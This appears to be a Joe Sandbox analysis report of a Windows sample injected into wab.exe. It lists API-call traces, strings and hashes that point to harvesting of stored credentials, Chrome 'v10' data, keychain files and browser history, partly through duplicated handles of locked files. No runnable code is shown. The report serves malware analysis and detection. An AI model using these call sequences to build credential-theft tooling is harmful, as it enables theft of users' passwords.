4169a7 11 API calls 40878->40896 40898 42b896 memset 40881->40898 40882 4308f3 40893 42bbbe 40882->40893 40884 4308ff 40897 415c23 memcpy 40884->40897 40887 42b63e 14 API calls 40886->40887 40888 441259 40887->40888 40888->40864 40888->40865 40888->40871 40889->40864 40890->40870 40891->40876 40892->40882 40899 42b9bd 40893->40899 40896->40881 40897->40881 40898->40875 40900 42b9d2 40899->40900 40914 42bb72 40899->40914 40901 42ba5a memcpy 40900->40901 40902 42ba69 memcpy memset 40900->40902 40900->40914 40903 42bab6 40901->40903 40902->40903 40905 42bad5 memcpy 40903->40905 40906 42baef 40903->40906 40905->40906 40907 42bb15 40906->40907 40909 42bb1a 40906->40909 40910 42bb0a 40906->40910 40908 42bb86 40907->40908 40915 42bb37 40907->40915 40913 42b9bd memcpy 40908->40913 40908->40914 40922 42bbd5 memcpy memcpy memcpy memset memcpy 40909->40922 40921 42be4c memcpy memcpy memcpy memset memcpy 40910->40921 40916 42bba0 40913->40916 40914->40884 40915->40914 40917 42b9bd memcpy 40915->40917 40918 42b9bd memcpy 40916->40918 40919 42bb5e 40917->40919 40918->40914 40920 42b9bd memcpy 40919->40920 40920->40914 40921->40907 40922->40907 40923 41493c EnumResourceNamesW 37681 4287c1 37682 4287d2 37681->37682 37683 429ac1 37681->37683 37684 428818 37682->37684 37685 42881f 37682->37685 37706 425711 37682->37706 37695 425ad6 37683->37695 37751 415c56 11 API calls 37683->37751 37718 42013a 37684->37718 37746 420244 97 API calls 37685->37746 37690 4260dd 37745 424251 120 API calls 37690->37745 37692 4259da 37744 416760 11 API calls 37692->37744 37698 422aeb memset memcpy memcpy 37698->37706 37699 429a4d 37700 429a66 37699->37700 37704 429a9b 37699->37704 37747 415c56 11 API calls 37700->37747 37702 4260a1 37743 415c56 11 API calls 37702->37743 37705 429a96 37704->37705 37749 416760 11 API calls 37704->37749 37750 424251 120 API calls 37705->37750 37706->37683 37706->37692 37706->37698 37706->37699 37706->37702 37714 4259c2 37706->37714 37717 425a38 37706->37717 37734 4227f0 

Control-flow Graph (starts at 0040DD85)

APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 594330280-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 912665193-1740548384
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                    • String ID: BIN
                                                                                                                                                                                                                    • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                                                                      • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$memcpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2420179184-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$FirstNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1690352074-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3558857096-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                                                                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                    • API String ID: 2745753283-3798722523
                                                                                                                                                                                                                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                                                                                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040BB66
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                    • String ID: chp$v10
                                                                                                                                                                                                                    • API String ID: 170802307-2783969131
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                    • API String ID: 3073804840-2252543386
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                                                                    • API String ID: 327780389-2689659898
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
